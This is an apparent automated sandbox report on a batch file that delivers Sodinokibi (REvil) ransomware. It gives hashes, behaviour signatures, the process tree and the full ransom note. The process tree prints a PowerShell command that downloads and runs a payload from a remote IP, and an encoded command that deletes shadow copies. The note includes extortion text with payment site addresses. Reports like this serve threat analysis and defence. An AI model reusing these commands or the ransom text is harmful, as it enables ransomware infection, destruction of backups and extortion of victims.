Resubmissions

19-02-2020 15:44

200219-dsykqxdnhn 10

18-02-2020 01:10

200218-fs36yr5yra 10

Analysis

  • max time kernel
    149s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7v200213
  • submitted
    18-02-2020 01:10

General

  • Target

    42HVHYvi.bat

  • Size

    192B

  • MD5

    a9075a0e43612a388eda0d4643037a34

  • SHA1

    6bfb53b342e2518e07955676e5a8f18717970504

  • SHA256

    811d39f86a8efff6544dcd852c24a3fe2e5446f5eb7fdd9e740b424a221ab366

  • SHA512

    9a9275289c65b19cc5e4d94572b1e6dfbe84c47a028193d0c142a363e0b279e0cb217d2d63c759839730ec8158460da427cb9ac354a124a9f6ae73ab7fa063ee

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/42HVHYvi

Extracted

Path

C:\8k238139d2-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 8k238139d2. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7BCBB476BE938F02 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/7BCBB476BE938F02 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: jIuceZq0MfvqpcB2a0DblRrUDssBCwBSx2GujTaot5QEEpzm/uwOIxzsX8hNpdeM yZ04oCQsvSgnG6EZtNHBU1j4I2KjiWbRo+YyhwZM4ZZisjggrw1VoTfUwyiP39pX RHGBk3iIzbHbOtmXmZUT6gJR/3FS6LhPcN9iUnU9GvY+sczlVnh0js/8rbQs4fgr JjBq99XiAswy9+gi1zP8PImrBB+P6YpnFve5+QTXKK4dAl/CO7L2UynyDagSEz6P fWENC5cLy9LA2OZkR7LqnizQmszAc2lHkDojFDn7WzFUjiKlf3qsjYH13qhh9rBP 9z/9QemKO34+tnPv/YJNuz/fBabgqSqJ23fLT7SZ1IdWn97O/BSKy8gY3V/z5UW+ So/mjxJKOt+k/moaXKiMaV+/XKwdh6Mn2XaL6r5JlxfYuEgH20HvQinwFxhrtnCR LxKGJo9cMFhufnYFeF6lfaylc42mgSdiDUafs4IibK11zcr2ehO1LjchLHwH/2y+ sZvL9O7kTYqh4lkudCes5TwNU7+G4NMDDYyiZj41opL3mW4P90G49D/jvHQ1a0Zm ENADGweWDk144/FyD9Ov8hrntwpEG0WPVjrtAb4fuVG2W3kiKyWoMNprDpJH8UCa udmuBJbF25uZeQRPwrsD9EYeQ2EMANH/1JeGAio2BIYXC95z4d3Jg5zrEdC0TS1U p88Y21KCB61U3QstxaREXKyZXf5LowT9Wj3Do3bKq+Coce8hmKQZg5TJgcZAb1Ee PmtsvZGVdayOmXGUYpDMexoScxCW42vXbCjyPjQNGQrZdniqYeBIkLHfy8Y9fmDO xa3LlGcpTLYHBVbQYxfN73E/DVTdUIqV07xw1ut5ojERWphj2Z0bHvtgm4vm0CBF bNEKhgbGO+0w7WtTzVr5s39gf1XJZ1fdEfBdoD+a+ak/OUPsQUjWXfP8/XuYxEKT 0BDPsaQfr5UoXNZYgsigqG8bI+2dyzib2Pv6GQMEjTSXXXq/cZetszBitJJJnpnB egd/Jf3r5MozaiFHKPnDJ0Ly3lJL/fQ8Nio7kicAcMVVOFb6t1XQ5L9BhJZEojya ZWkJHLSQcwmBCaqNrItClKmJtDpU3YOZUw6UEcV2eYhACUE1y8W6nN3qxTpyctjj iuqEpAVZNlMZ7YcKKet2D+Lxd88GW4oXDzQquTYLQd5UjAV3l25TGexA+nkEXQ+L TkOeb56/0cy99FP97gt4dwkuG3l2P4s3pfltI1gOjUvSVV72tr66RokxxMbskFd7 l9j1cxpCDkpqV5SI7TxSOrt14GeiEO8GmDCli/jp1NnVWeP9O832SA== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7BCBB476BE938F02

http://decryptor.cc/7BCBB476BE938F02

Signatures

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Blacklisted process makes network request 32 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 37 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\42HVHYvi.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1992
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/42HVHYvi');Invoke-OCJPTYYSX;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      • Discovering connected drives
      • Drops file in Program Files directory
      • Modifies system certificate store
      PID:2016
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Discovering connected drives
        PID:1580
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1736

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_269fc7d6-389e-41b0-b64b-7c0856c31fc7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_81674632-3ac2-413b-8a14-55e00bb0eca6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aab85910-7ac3-4fc4-bbec-5e43e50581e6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d23a525b-13be-4981-917b-c14eaa6ecb8d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_da5c55b5-c1bb-4597-a419-36df000a20bd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e09b2a6a-d455-4170-a504-c8cdd16a5e67

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms